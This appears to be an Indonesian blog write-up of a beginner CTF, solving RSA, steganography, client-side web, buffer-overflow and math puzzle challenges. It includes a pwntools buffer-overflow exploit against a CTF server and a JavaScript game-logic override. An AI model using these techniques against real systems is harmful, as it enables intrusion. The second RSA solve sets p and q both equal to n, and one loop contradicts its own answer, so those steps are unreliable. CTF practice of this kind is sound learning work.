B01lers Bootcamp CTF Write-Up

B01lers CTF bootcamp is a brand-new super-introductory CTF for beginners. It is also a training camp!, this event is running from Sat, 03 Oct. 2020, 13:00 UTC until Mon, 05 Oct. 2020, 00:00 UTC.

Crypto

Baik disini kita diberikan sebuah file yang berisikan text berikut

Modulus: 98570307780590287344989641660271563150943084591122129236101184963953890610515286342182643236514124325672053304374355281945455993001454145469449640602102808287018619896494144221889411960418829067000944408910977857246549239617540588105788633268030690222998939690024329717050066864773464183557939988832150357227One factor of N:  9695477612097814143634685975895486365012211256067236988184151482923787800058653259439240377630508988251817608592320391742708529901158658812320088090921919Public key: 65537Ciphertext: 75665489286663825011389014693118717144564492910496517817351278852753259053052732535663285501814281678158913989615919776491777945945627147232073116295758400365665526264438202825171012874266519752207522580833300789271016065464767771248100896706714555420620455039240658817899104768781122292162714745754316687483

ini adalah RSA challenge, jadi disini perlu diperhatikan pada “Modulus” dan “One factor of N” jika diperhatikan disini “One factor of N” ini ada salah satu hasil kali yang akan menghasilnya “N”, jadi saya beranggapan “One factor of N” ini ada p atau q.

n=98570307780590287344989641660271563150943084591122129236101184963953890610515286342182643236514124325672053304374355281945455993001454145469449640602102808287018619896494144221889411960418829067000944408910977857246549239617540588105788633268030690222998939690024329717050066864773464183557939988832150357227p=9695477612097814143634685975895486365012211256067236988184151482923787800058653259439240377630508988251817608592320391742708529901158658812320088090921919e=65537c=75665489286663825011389014693118717144564492910496517817351278852753259053052732535663285501814281678158913989615919776491777945945627147232073116295758400365665526264438202825171012874266519752207522580833300789271016065464767771248100896706714555420620455039240658817899104768781122292162714745754316687483

disini karena sudah diberikan value dari p, jadi kita tinggal bagi nilai n dengan p, dan hasilnya akan disimpan sebagi q.

q=n/p
q=10166627341555233885462189686170129966199363862865327417835599922534140147190891310884780246710738772334481095318744300242272851264697786771596673112818133

Sekarang kita cari nilai phi

phi=(q-1)*(p-1)
phi=98570307780590287344989641660271563150943084591122129236101184963953890610515286342182643236514124325672053304374355281945455993001454145469449640602102788424913666243446115125013749894802497855425825476346571837495143781689593338561218309247406348975238353391320418652358081883392298327112356072070946617176

Kemudian saya menggunakan library python untuk melakukan inverse.

from Crypto.Util.number import inverse

Sekarang kita lakukan inverse e dan phi lalu simpan ke variable d untuk mendecrypt cipher text

d=inverse(e,phi)
msg=hex(pow(c,d,n))
binascii.unhexlify(msg[2:])

dan kita pun mendapatkan flagnya.

Flag: flag{4cce551ng_th3_subc0nsc10us}

Pada challenge ini juga merupakan RSA challenge

n = 102346477809188164149666237875831487276093753138581452189150581288274762371458335130208782251999067431416740623801548745068435494069196452555130488551392351521104832433338347876647247145940791496418976816678614449219476252610877509106424219285651012126290668046420434492850711642394317803367090778362049205437c = 4458558515804625757984145622008292910146092770232527464448604606202639682157127059968851563875246010604577447368616002300477986613082254856311395681221546841526780960776842385163089662821e = 3

kita cari nilai p dan q, disini saya berhasil mendapatkanya

p=102346477809188164149666237875831487276093753138581452189150581288274762371458335130208782251999067431416740623801548745068435494069196452555130488551392351521104832433338347876647247145940791496418976816678614449219476252610877509106424219285651012126290668046420434492850711642394317803367090778362049205437
q=102346477809188164149666237875831487276093753138581452189150581288274762371458335130208782251999067431416740623801548745068435494069196452555130488551392351521104832433338347876647247145940791496418976816678614449219476252610877509106424219285651012126290668046420434492850711642394317803367090778362049205437

kita cari nilai phi

phi=(p-1)*(q-1)
phi=10474801519946645316417565344777824838219708995451314866896383244670390593913811948109387735974123070178749927269183660211063324498361040455900054656550735194165142341553442563087498692446203363621605237701572669108848641537377100110178341025605353946998431204448110757775765930130150626824833269288964565444361632976086221837274726544673960066012620127438221419099381591240315165523675164596642153418106589681519248500993547574562305231771125587608162236882395361002311839054971313998078853806314679144189227583718441072788362881520362156630941600112869138008923275344098164691831773913293487342645765572838931950096

sekarang kita cari nilai dari variable d dan kita decrypt encerypted stringnya

d=3491600506648881772139188448259274946073236331817104955632127748223463531304603982703129245324707690059583309089727886737021108166120346818633351552183578398055047447184480854362499564148734454540535079233857556369616213845792366703392780341868451315666143734816036919258588643376716875608277756429654855148154659817965136667141464260849930517762904626858934290429510724176196642631711166575616978556701885704311996374931698773210246908613440680054430908477929237507805557162769887291575366984085156880202734800132351840669279711377079888579121939799506716711737981130172866394894161851895935048670952117066993718511

dan kita pun mendapatkan flagnya.

Flag: flag{w3_need_7o_g0_d3ep3r}

Misc

Disini diberikan sebuah audio file, saya langsung buka mengguanakan sonic visualizer, silahkan baca write-up sebelumnya untuk penjelasan lebih jauh, karena challenge ini sama seperti sebelumnya.

Disini saya hanya menambahkan layer spectogram

dan kita pun mendapatkan flagnya.

Pada challenge ini saya hanya menggunakan syntax strings untuk mendapatkan flagnya

strings GarrettScholes.png | grep flag

dan kita pun mendapatkan flagnya.

Flag: flag{h4t3d_1n_th3_n4t10n_0MTBu}

Pada challenge ini kita diberikan zip file yang lumayan besar dan berisikan sebuah directory yang didalamnya berisikan banyak file yang berisikan string.

disini saya sama seperti challenge easy lain menggunakan syntax strings

ls * | xargs cat | grep -i flag

dan kita pun mendapatkan flagnya.

Flag: flag{y0u_f0unD_Th3_n33d1e!}

Pada challenge ini kita diberikan file image, disini saya menggunaka strings, file dan exiftool tidak menemukan apapun, jadi saya membukanya menggunakan stegsolve karena ada bagian dari gambar yang memang mencolok.

dan setelah memainkan pixel pada gambar menggunakan stegsolve saya menemukan flagnya.

Flag: flag{t3ll_by_th3_p1x3ls}

Web

Buka link yang diberikan, seperti ini tampilannya

jika kita lihat page source nya, disana terdapat logic login menggunakan javascript, jadi username dan passwordnya terekspose.

function login(username, password) {
if (username == "CLU" && password == "0222") {
window.location = "/maze";
} else window.location = "/";
}

Setelah login, kita disuguhi sebuah game labirin yang dimana labirinnya berubah tiap detik

dan jika diperhatikan kita tidak memungkinkan berhasil mencapai titik yang diminta dengan cara biasa karena titik tersebut tertutup, disini saya menemukan javascript yang mengatur game ini, jadi disana saya menemukan sebuah function untuk menggerakan karakter game, dan saya coba manipulasi function tersebut.

Setelah saya mencapai posisi terdekat dengan titik tersebut, saya buka console pada dev tools dan memasukan function yang sudah saya manipulasi

function move_left() {
let cell = get_cell(x - 1, y);
if (cell == null) return;
remove_x();
x -= 1;
add_x();
check_data();
}

dengan script tersebut tembok penghalang pada game tidak berfungsi pada karakter lagi, tinggal menggerakan kekiri, kita pun mendapatkan flagnya

Flag: flag{you_aren’t_making_me_talk!}

Langsung buka link yang diberikan, dan web ini menampilkan text yang user inputkan

jika terlalu berfokus pada input text tersebut mungkin kita akan menemui rabbite hole dan beranggapan bisa melakukan RCE, disini saya mengecek debugger menggunakan dev tools, dan menemukan file javascript

dan saya tertarik pada bagian yang di obfuscate, jadi saya coba deobfuscate menggunakan web online

var _0x2e2c = ['trigger', 'okbuttonclicked', 'getElementById', 'flag{y0u_sh0uldnt_h4v3_c0m3_b4ck_flynn}', 'jQuery', 'alert'];
(function (_0x4a3766, _0x6d4dbb) {
var _0x277919 = function (_0x4f968d) {
while (--_0x4f968d) {
_0x4a3766['push'](_0x4a3766['shift']());
}
};
_0x277919(++_0x6d4dbb);
}(_0x2e2c, -0x1a8d + -0x2 * 0x9f + -0x1 * -0x1c45));
var _0xd7f1 = function (_0x4a3766, _0x6d4dbb) {
_0x4a3766 = _0x4a3766 - (-0x1a8d + -0x2 * 0x9f + -0x1 * -0x1bcb);
var _0x277919 = _0x2e2c[_0x4a3766];
return _0x277919;
};
var _0x4f89d1 = _0xd7f1;
window[_0x4f89d1('0x3')] = function (_0x36059f, _0x256ac9) {
return function (_0x5cbfad) {
var _0x2fc60f = _0xd7f1;
_0x36059f(_0x5cbfad), _0x256ac9(window)[_0x2fc60f('0x4')]('okbuttonclicked');
};
}(window[_0x4f89d1('0x3')], window[_0x4f89d1('0x2')]), $(window)['on'](_0x4f89d1('0x5'), function () {
var _0x452fbb = _0x4f89d1;
document[_0x452fbb('0x0')]('result')['innerText'] = _0x452fbb('0x1');
});

dan kita pun mendapatkan flagnya.

Flag: flag{y0u_sh0uldnt_h4v3_c0m3_b4ck_flynn}

Seperti sebelumnya langsung buka link yang diberikan, seperti ini tampilannya

pada challenge ini kita hanya perlu manacari flag yang dibagi jadi 5 bagian dan menggabungkannya.

Bagian pertama ada pada page source

Bagian ke-2 ada pada console, ditampilkan sebagai error

Bagian ke-3 ada pada css file

Bagian ke-4 ada pada javascript file

Dan yang terakhir ada pada bagian local storage pada web.

Kita pun mendapatkan flagnya.

Flag: flag{w3lc0m3_t0_ENC0M}

Pwn

Disini saya langsung menjalankan file dan membuka file menggunakan gdb

disini saya coba pasang breakpoints pada main+430 pada saat program mengcompare register rbx dan rax, jika data sama maka program akan menjalankan /bin/sh.

disini kita bisa tau register raxdi compare oleh string “UU”, jadi kita harus merubah value register tersebut, disini saya berpikir mungkin kita bisa menggunakan Buffer Overflow attack, setelah mencoba dan saya pun membuat exploitnya

#!/usr/bin/env python2
from pwn import *
r = remote("chal.ctf.b01lers.com",1014)
r.recv()
r.sendline(fit({104:"\x55\x55"}))
r.interactive()

dan kita pun mendapatkan flagnya.

Flag: flag{Ne0_y0uAre_d0ing_well}

Crypto World

Pada challenge ini sebuah challenge cryptography yang berisikan matematika, disini karena saya tidak terlalu pintar dan saya pemalas, jadi saya buat simple program untuk mendapatkan jawabannya :v

You see an inn and decide that you deserve to splurge some on a good meal and a comfy bed. The room is tidy and clean but you do notice certain little visitors... mice. Fear not, the innkeeper's cat comes eagerly to your rescue.
But whenever it tries to catch one, the mouse quickly disappears in one of many mouseholes in the room. With this game going on and on for minutes, you swear those mice must be playing with the cat. Interesting, you think, there must be a smarter way to capture small creatures...
LEVEL 1: find *small* nonzero integers x, y, z that satisfy 299*x + 355*y + 251*z = 0
(e.g., x = 355*251, y = 299*251, z = -2*299*355 does not count)
```n=1000for x in range(n+1):
for y in range(n+1):
for z in range(n+1):
if ((299*(x))+(355*(y))+(251*(z))) == 0 and (x > 0 and y > 0 and z > 0):
print(f"x: {x}, y: {y}, z: {z}")
break
```
> answer 13 -6 -7
CORRECT! Your flag is mini{A1_27f3abda81e75486b9299fda}

Dan saya pun dapatkan result yang sesuai klasifikasi pada soal

Flag: mini{A1_27f3abda81e75486b9299fda}

Passing by a small town, you meet a scholar, and you two walk together for a while. He rambles about a manuscript that, he says, claims the preposterous idea that one equation could nail down two variables simultaneously. Since you show enough interest, he lets you copy a few puzzles from the book.LEVEL 1: find integers x and y that satisfy 123*x + 179*y = 1```
for x in range(-200,201):
for y in range(-200,201):
if ((123*(x))+(179*(y))) == 1:
print(f"x: {x}, y: {y}")
break
```
> answer -16 11
CORRECT! Your flag is mini{B1_485a3ae14ebb98e8ccc855b3}

Flag: mini{B1_485a3ae14ebb98e8ccc855b3}

Higher up on the hillside you come across a small house with a tidy garden.
An elderly rabbit lady in a rocking chair is observing you, while she nibbles on some sort of brown root (carrot maybe?). "Have some, my dear" she says, "great for vision." You oblige, and indeed, as if finer distinctions started to materialize in things. "Now we just need to calibrate the dose," says the rabbit and gives you something colorful to peer into.
LEVEL 1: find an integer that satisfies x^2 mod 97 = 88```
for x in range(1001):
if (x**2)%97 == 88:
print(x)
```
> answer 31
CORRECT! Your flag is mini{C1_4c88b7b4c11a9ee43f33e130}

Flag: mini{C1_4c88b7b4c11a9ee43f33e130}

As dusk falls you make camp at a logging area. There are tree stumps
everywhere, some truly gigantic ones too. You are just about to fall asleep when you hear footsteps - one of the fellers came back for his axe. He moves sluggishly as if his limbs were made of lead, totally obliviously to your presence. As he leaves you catch him grumbling about how hard this line of work is. Your eyes close and you dream, of something quite peculiar...

LEVEL 1: find an integer that satisfies 11^x mod 101 = 27
(here ^ means exponentiation, e.g., 2^7 mod 5 = 3)
```
for x in range(20000):
if 11**x%101 == 27:
print(x)
```
> ans 39
CORRECT! Your flag is mini{D1_77858210bb3c8f6f90642947}

Flag: mini{D1_77858210bb3c8f6f90642947}

As you trek through dense forest, you notice a giant snake curled up in the center of a clearing ahead. You freeze, and try to tip-toe back, but it's too late. "Count your blessssingsss, human, for I'm not hungry... thisss time. Sssspeaking of counting... I can tell you sssecrets if you demonssstrate you are capable.

LEVEL 1: how many primes are there between 1200 and 1500?
```
lower=1200
upper=1500
c=0
for num in range(lower, upper + 1):
# all prime numbers are greater than 1
if num > 1:
for i in range(2, num):
if (num % i) == 0:
break
else:
c+=1
```
> ans 43
CORRECT! Your flag is mini{F1_c45a3e68b37e85ee427389c5}

Flag: mini{F1_c45a3e68b37e85ee427389c5}

You are at a signpost, trying to figure out which path will get you through the forest. While you are contemplating, another traveller arrives. The fellow seems to know his way, so you decide to ask him. He gestures about (as if asking a question?) but you hear nothing. It is then that you realize that he cannot speak. You seem crestfallen but the traveller's face brightens - he takes out parchment and ink from his bag and begins to write... something that looks gibberish to you. Still, you do notice some familiarity in those symbols...

LEVEL 1: the base64-encoded string below corresponds to XOR-encrypted
text, with key length of 1 byte. What is the integer in the
message?

PQEMSRoMChsMHUkABx0MDgwbSQAaSR0eDAcdEEQPAB8MSR0BBhwaCAcNRUkPAB8MSQEcBw0bDA1JCAcNSR0eDAUfDEc=
```
Cyber Cheff --> Key 69
```
> answer 25512
CORRECT! Your flag is mini{H1_5ed3aca835bc208203da988b}
imminent. Luckily you spot a big oak tree and manage to find shelter under its
canopy just in time. While the hail falls, you have time to contemplate the
lectures by your old mentors. Perhaps the answers won't elude you this time?
LEVEL 1: factor the number 48263. (E.g., for 12, you would answer 2 2 3)```
http://factordb.com/index.php?query=48263
```
> answer 17 17 167
CORRECT! Your flag is mini{I1_1a8ec6471c8824fff864a95c}

Flag: mini{I1_1a8ec6471c8824fff864a95c}

LEVEL 2: factor the number 8477969543906630921459041527576694. (E.g., for 12, you would answer 2 2 3)```
http://factordb.com/index.php?query=8477969543906630921459041527576694
```
> answer 2 7 7 13 19 19 79 601 234490397 1655726489421517
CORRECT! Your flag is mini{I2_03ba7452553b74b5122c58f0}

Flag: mini{I2_03ba7452553b74b5122c58f0}

You make camp by a delapidated building that must have been a shrine in its better days. As the rays of the setting sun illuminate the walls, you notice a crevice with a piece of parchment tucked inside... a treasure map! Though you cannot quite make out which direction is east or west, and north or south, on the map, this *could* be payday - provided you figure out the right number of steps to take.LEVEL 1: find positive integers x, y that solve x^2 + 22*y^2 = 8383```
for x in range(-100,100):
for y in range(-100,100):
if (x**2)+(22*y**2) == 8383:
print(f"x: {x}, y: {y}")
```
> answer 21 19
CORRECT! Your flag is mini{J1_c9d7861b2635ebb151b71351}

Flag: mini{J1_c9d7861b2635ebb151b71351}

The road curves and gives way to marshland. You tread by one careful
step after another, focused so much on your footings that you only notice the lizardman when he starts talking to you. "Hello, I am in the Enformation Commerce. We two must have things to trade." He needs help with math to break some encrypted messages.
LEVEL 1: solve the equations below for x and y(76*x + 221*y) mod 281 = 85
(171*x + 190*y) mod 281 = 138
```
n=1000
for x in range(-n,n+1):
for y in range(-n,n+1):
if ( ((76*(x))+(221*(y))) % 281 == 85) and ( ((171*(x))+(190*(y)))%281 == 138 ):
print(f"x: {x}, y: {y}")
```
> answer 111 -849
CORRECT! Your flag is mini{K1_cc1c3c9a5695228061017a76}

Flag: mini{K1_cc1c3c9a5695228061017a76}

(Jika ada yang ingin ditanyakan silahkan komentar)

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL

PARSECT // IT Security Enthusiast // STOICISM // KEEP DO SOMETHING LEGAL